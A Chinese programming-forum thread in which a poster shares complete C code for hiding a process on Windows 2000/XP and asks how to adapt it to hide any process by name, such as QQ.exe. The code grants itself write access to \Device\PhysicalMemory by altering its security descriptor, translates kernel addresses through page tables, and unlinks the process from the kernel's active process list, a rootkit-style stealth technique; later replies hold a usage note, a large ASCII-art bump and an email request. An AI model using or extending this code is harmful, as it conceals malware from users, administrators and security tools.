研究过隐藏进程的前辈请进,我有一段代码需要你的帮助,来者有分

我是一VC爱好者,近来研究Win2K/WinXP下进程的隐藏,找到了下面一段代码,可以隐藏程序本身所在进程,但是我想通过一个名称,比如“QQ.exe”来隐藏进程,而不仅仅局限在隐藏程序本身的进程,由于对系统内核不了解,又不懂汇编,看了很久也没搞明白该怎么改,这两天翻阅资料无数仍无收获,请各位革命老前辈指点指点我,在此不胜感激!最后感谢每一位来捧场的朋友!代码如下://///////////////////////////////////////////////////////////////////////////
//HideProcess.h
#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)typedef LONG NTSTATUS;typedef struct _IO_STATUS_BLOCK 
{
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;typedef struct _UNICODE_STRING 
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;#define OBJ_INHERIT                0x00000002L
#define OBJ_PERMANENT              0x00000010L
#define OBJ_EXCLUSIVE              0x00000020L
#define OBJ_CASE_INSENSITIVE       0x00000040L
#define OBJ_OPENIF                 0x00000080L
#define OBJ_OPENLINK               0x00000100L
#define OBJ_KERNEL_HANDLE          0x00000200L
#define OBJ_VALID_ATTRIBUTES       0x000003F2Ltypedef struct _OBJECT_ATTRIBUTES 
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
BOOL InitNTDLL()
{
    g_hNtDLL = LoadLibrary("ntdll.dll");    if (NULL == g_hNtDLL)
{
        return FALSE;
}    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");    return TRUE;
}
//---------------------------------------------------------------------------
VOID CloseNTDLL()
{
    if(NULL != g_hNtDLL)
{
        FreeLibrary(g_hNtDLL);
}    g_hNtDLL = NULL;
}
//---------------------------------------------------------------------------
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) 

    PACL pDacl                  = NULL; 
    PSECURITY_DESCRIPTOR pSD    = NULL; 
    PACL pNewDacl               = NULL; 
    
    DWORD dwRes = GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,&pDacl,NULL,&pSD);    if(ERROR_SUCCESS != dwRes)
    {
if(pSD) 
{
LocalFree(pSD); 
}
if(pNewDacl) 
{
LocalFree(pNewDacl); 
}
    }    EXPLICIT_ACCESS ea; 
    RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); 
    ea.grfAccessPermissions = SECTION_MAP_WRITE; 
    ea.grfAccessMode = GRANT_ACCESS; 
    ea.grfInheritance= NO_INHERITANCE; 
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; 
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER; 
    ea.Trustee.ptstrName = "CURRENT_USER";     dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
    
    if(ERROR_SUCCESS != dwRes)
    {
if(pSD) 
{
LocalFree(pSD); 
}
if(pNewDacl) 
{
LocalFree(pNewDacl); 
}
    }    dwRes = SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);
    
    if(ERROR_SUCCESS != dwRes)
    {
if(pSD) 
{
LocalFree(pSD); 
}
if(pNewDacl) 
{
LocalFree(pNewDacl); 
}
    }} 
//---------------------------------------------------------------------------
HANDLE OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory;    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx (&g_osvi);    if (5 != g_osvi.dwMajorVersion)
{
        return NULL;
}    switch(g_osvi.dwMinorVersion)
    {
        case 0:
            PhyDirectory = 0x30000;
            break; //2k
        case 1:
            PhyDirectory = 0x39000;
            break; //xp
        default:
            return NULL;
    }    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");    attributes.Length                    = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory             = NULL;
    attributes.ObjectName                = &physmemString;
    attributes.Attributes                = 0;
    attributes.SecurityDescriptor        = NULL;
    attributes.SecurityQualityOfService  = NULL;    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);     if(status == STATUS_ACCESS_DENIED)
    { 
        status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); 
        SetPhyscialMemorySectionCanBeWrited(g_hMPM); 
        CloseHandle(g_hMPM);
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); 
    }    if(!NT_SUCCESS(status)) 
{
return NULL;
}    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);    if( g_pMapPhysicalMemory == NULL )
{
        return NULL;
}    return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
    PGDE = BaseAddress[VAddr>>22];    if (0 == (PGDE&1))
{
        return 0;
}    ULONG tmp = PGDE & 0x00000080;    if (0 != tmp)
    {
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    }
    else
    {
        PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
        PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
        
        if (0 == (PTE&1))
{
            return 0;
}        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
    }    return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
    
    if (0 == tmp)
{
        return 0;
}
    ULONG ret = tmp[(phys & 0xFFF)>>2];
    UnmapViewOfFile(tmp);    return ret;
}
//---------------------------------------------------------------------------
BOOL SetData(PVOID addr,ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);    if (0 == tmp)
{
        return FALSE;
}    tmp[(phys & 0xFFF)>>2] = data;
    UnmapViewOfFile(tmp);    return TRUE;
}
//---------------------------------------------------------------------------
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
   ExitProcess(0);
   return 1 ;
}

解决方案 »

  1.   

    //---------------------------------------------------------------------------
    BOOL YHideProcess()
    {
    //    SetUnhandledExceptionFilter(exeception);    if (!InitNTDLL())
    {
            return FALSE;
    }
        if (!OpenPhysicalMemory())
    {
            return FALSE;
    }    ULONG thread  = GetData((PVOID)0xFFDFF124); //kteb
        ULONG process = GetData(PVOID(thread + 0x44)); //kpeb    ULONG fw, bw;
    //2K
        if (0 == g_osvi.dwMinorVersion)
        {
            fw = GetData(PVOID(process + 0xa0));
            bw = GetData(PVOID(process + 0xa4));        
        }
    //XP
        if (1 == g_osvi.dwMinorVersion)
        {
            fw = GetData(PVOID(process + 0x88));
            bw = GetData(PVOID(process + 0x8c));
        }
            
        SetData(PVOID(fw + 4), bw);
        SetData(PVOID(bw), fw);    CloseHandle(g_hMPM);
        CloseNTDLL();    return TRUE;
    }BOOL HideProcess()
    {
    static BOOL bHide = FALSE;
    if (!bHide)
    {
    bHide = TRUE;
    if(!YHideProcess())
    {
    return FALSE;
    }
    }
    return TRUE;
    }
      

  2.   

    隐藏程序本身进程时只需#include "HideProcess.h" 并调用“HideProcess()”就可以了,可是我非常需要他能做到隐藏任意进程(知道那个进程的名称的情况下),可是我没有搞明白这段程序到底是在哪里把自身进程给隐藏的,一点也没看懂,无奈水平太低,请各位革命老前辈不吝赐教,我倾囊送分!
      

  3.   

    ................888888888888888888888888 
    ...............8888:::8888888888888888888888888 
    .............8888::::::8888888888888888888888888888 
    ............88::::::::888:::8888888888888888888888888 
    ..........88888888::::8:::::::::::88888888888888888888 
    ........888.8::888888::::::::::::::::::88888888888...888 
    ...........88::::88888888::::顶::::::::::88888888888....8 
    .........888888888888888888:顶:::::::::::8888888888888 
    ........88888888888888888888::::::::::::顶88888888888888 
    ........8888888888888888888888:::::::::顶8888888888888888 
    .........8888888888888888888888:::::::顶888888888888888888 
    ........8888888888888888::88888::::::顶88888888888888888888 
    ......88888888888888888:::88888:::::顶888888888888888...8888 
    .....88888888888888888:::88888::::顶::;o*顶*o;888888888....88 
    ....88888888888888888:::8888:::::顶:::::::::::88888888....8 
    ...88888888888888888::::88::::::顶:;:::::::::::888888888 
    ..8888888888888888888:::8::::::顶::aAa::::::::顶8888888888.......8 
    ..88...8888888888::88::::8::::顶:::::::::::::888888888888888.8888 
    .88..88888888888:::8:::::::::顶::::::::::;::88:88888888888888888 
    .8..8888888888888:::::::::::顶::"@@@@@@@"::::8w8888888888888888 
    ..88888888888:888::::::::::顶:::::"@a@":::::顶8i888888888888888 
    .8888888888::::88:::::::::顶88:::::::::::::顶88z88888888888888888 
    8888888888:::::8:::::::::顶88888:::::::::顶顶888!888888888888888888 
    888888888:::::8:::::::::顶8888888顶A顶顶顶A顶V顶顶888*88888888...88888888 
    888888.顶:::::::::::::::顶888888888:::::::顶顶88888888888888...8888888 
    8888...顶::::::::::::::顶88888888888::::::顶顶888888888888888....88888 
    .888...顶:::::::::::::顶8888888888888顶:::::顶顶888888888888888....8888 
    ..888..顶::::::::::::顶8888:888888888888::::顶::顶顶88888.888888...8888 
    ...88..顶::::::::::::8888:88888888888888888::::::顶顶8...88888...888 
    ...88..顶::::::::::8888顶::88888::888888888888:::::::顶顶88888....88 
    ...8...顶顶::::::::8888顶:::8888:::::888888888888::::::::顶顶8.....4 
    .......8顶:::::::8888顶:::::888:::::::88:::8888888::::::::顶顶....2 
    ......88顶顶:::::8888顶:::::::88::::::::8:::::888888:::顶:::::顶 
    .....8888顶:::::888顶顶::::::::8:::::::::::顶::::8888::::顶::::顶 
    ....88888顶:::::88:顶::::::::::8:::::::::::顶:::8888::::::顶::顶 
    ...88.888顶顶:::888:顶:::::::::::::::::::::::顶:8888:::::::::顶: 
    ...8.88888顶:::88::顶:::::::::::::::::::::::顶顶:88::::::::::::顶 
    .....88888顶:::88::顶::::::::::*88*::::::::::顶:88::::::::::::::顶 
    ....888888顶:::88::顶:::::::::88@@88:::::::::顶::88::::::::::::::顶 
    ....888888顶顶::88::顶顶::::::::88@@88:::::::::顶:::8::::::::::::::*8 
    ....88888..顶:::8::顶顶:::::::::*88*::::::::::顶:::::::::::::::::88@@ 
    ....8888...顶顶::::::顶顶:::::::::::::::::::::顶顶:::::::::::::::::88@@ 
    .....888....顶:::::::顶顶:::::::::::::::::::顶顶::顶::::::::::::::::*8 
    .....888....顶顶:::::::顶顶顶::::::::::::::::顶顶:::顶顶:::::::::::::::顶 
    ......88.....顶::::::::顶顶顶顶:::::::::::顶顶顶顶:::::顶顶::::::::::::顶顶 
    .......88....顶顶:::::::::顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶::::::::顶顶顶 
    ........88....顶顶::::::::::::顶顶顶顶顶顶顶::::::::::::::顶顶顶顶顶顶 
    .........88...8顶顶::::::::::::::::::::::::::::::::::顶顶顶顶顶顶 
    ..........8...88顶顶::::::::::::::::::::::顶:::顶::::::::顶顶 
    ..............888顶顶::::::::::::::::::顶顶::::::顶顶::::::顶顶 
    .............88888顶顶:::::::::::::::顶顶顶:::::::顶顶:::::顶顶 
    .............888888顶顶:::::::::::::顶顶顶:::::::::顶顶顶:::顶 
    ............88888888顶顶:::::::::::顶顶顶:::::::::::顶顶:::顶 
    ...........88.8888888顶:::::::::顶顶顶::::::::::::::顶:::顶 
    ...........8..888888.顶:::::::顶顶:::::::::::::::::顶:::顶: 
    ..............888888.顶::::::顶:::::::::::::::::::顶:::顶顶 
    .............888888..顶:::::顶::::::::::::::::::::::::顶:顶 
    .............888888..顶:::::顶:::::::::@::::::::::::::顶::顶 
    .............88888...顶::::::::::::::@@:::::::::::::::顶::顶 
    ............88888...顶::::::::::::::@@@::::::::::::::::顶::顶 
    ...........88888...顶:::::::::::::::@@::::::::::::::::::顶::顶 
    ..........88888...顶:::::顶::::::::::@::::::::::顶顶:::::::顶:::顶 
    ..........8888...顶:::::顶:::::::::::::::::::::::顶顶:::::::顶:::顶 
    .........8888...顶:::::顶:::::::::::::::::::::::顶顶顶::::::::顶:::顶 
    ........888....顶:::::顶顶::::::::::::::::::::::顶顶顶:::::::::顶::::顶 
    ......8888....顶顶::::顶顶:::::::::::::::::::::顶顶顶顶:::::::::顶::顶:::顶 
    .....888......顶:::::顶::::::::::::::::::::顶顶顶::::::::::::顶::顶顶:::顶 
    ..8888.......顶顶:::::::::::::::::::::::::顶顶:::::::::::::顶顶::顶顶:::顶: 
    .............顶:::::::::::::::::::::::::顶:::::::::::::::顶顶::顶顶:::顶顶 
    ............顶顶::::::顶:::::::::::::::::::::::::::::::::::顶::顶顶:::顶顶 
    ............顶::::::::顶:::::::::::::::::::::::::::::::::::顶::顶:::顶顶 
    ...........顶顶:::::::::顶:::::::::::::顶:::::::::::::::::::::顶:顶:::顶顶 
    ...........顶:::::::::::顶88:::::::::顶:::::::::::::::::::::::顶顶::顶顶顶 
    ...........顶::::::::::::8888888888顶::::::::::::::::::::::::顶顶::顶顶 
    ...........顶:::::::::::::88888888顶:::::::::::::::::::::::::顶::顶顶 
    ...........顶::::::::::::::888888顶:::::::::::::::::::::::::顶::顶顶 
    ...........顶:::::::::::::::88888顶:::::::::::::::::::::::::顶:顶顶 
    ...........顶:::::::::::::::::88顶::::::::::::::::::::::::::顶顶顶 
    ...........顶:::::::::::::::::::顶::::::::::::::::::::::::::顶顶顶 
    ...........顶顶:::::::::::::::::顶::::::::::::::::::::::::::顶顶顶 
    ............顶:::::::::::::::::顶::::::::::::::::::::::::::顶顶顶 
    ............顶顶:::::::::::::::顶::::::::::::::::::::::::::顶顶顶 
    .............顶:::::::::::::::顶:::::::::::::::::::::::::顶顶顶 
    .............顶顶:::::::::::::顶:::::::::::::::::::::::::顶顶顶 
    ..............顶:::::::::::::顶::::::::::::::::::::::::顶顶顶 
    ..............顶顶:::::::::::顶::::::::::::::::::::::::顶顶顶 
    ...............顶:::::::::::顶:::::::::::::::::::::::顶顶顶 
    ...............顶顶:::::::::顶:::::::::::::::::::::::顶顶顶 
    ................顶:::::::::顶::::::::::::::::::::::顶顶顶 
    ................顶顶:::::::顶::::::::::::::::::::::顶顶顶 
    .................顶顶::::::顶:::::::::::::::::::::顶顶顶 
    .................顶顶:::::顶:::::::::::::::::::::顶顶顶 
    ..................顶顶::::顶::::::::::::::::::::顶顶顶 
    ..................顶顶:::顶::::::::::::::::::::顶顶顶 
    ...................顶顶::顶:::::::::::::::::::顶顶顶 
    ...................顶顶:顶:::::::::::::::::::顶顶顶 
    ....................顶顶顶::::::::::::::::::顶顶顶 
    ....................顶顶::::::::::::::::::顶顶顶 
    .....................顶:::::::::::::::::顶顶顶 
    ....................顶顶::::::::::::::::顶顶顶 
    ....................顶顶:::::::::::::::顶顶顶 
    ....................顶顶::::顶:::::::::顶顶顶: 
    ....................顶顶顶::::顶顶:::::::顶顶顶顶 
    .....................顶顶顶:::::::::::顶顶顶:顶 
    .....................顶顶顶:::顶:::::::顶:顶:顶 
    ......................顶顶::顶顶顶顶:::::::顶:顶 
    ......................顶顶::顶顶顶::::::::顶:顶 
    ......................顶顶顶::顶顶::::::::顶:顶 
    .......................顶顶::顶顶:::::::::顶:顶 
    .......................顶顶::顶顶::::::::::顶:顶 
    .......................顶顶:::顶:::::::::::顶顶 
    .......................顶顶顶:::::::::::::::顶: 
    .......................顶顶顶:::::::::::::::顶: 
    .......................顶顶顶::::::::::::::::顶 
    .......................顶顶顶::::::::::::::::顶 
    .......................顶顶顶::::::::::::::::顶顶 
    ........................顶顶::::::::::::::::顶顶 
    ........................顶顶顶:::::::::::::::顶顶 
    ........................顶顶顶:::::::::::::::顶顶 
    ........................顶顶顶:::::::::::::::顶
      

  4.   

    [email protected]@sina.com多谢好心人,祝好人一生平安!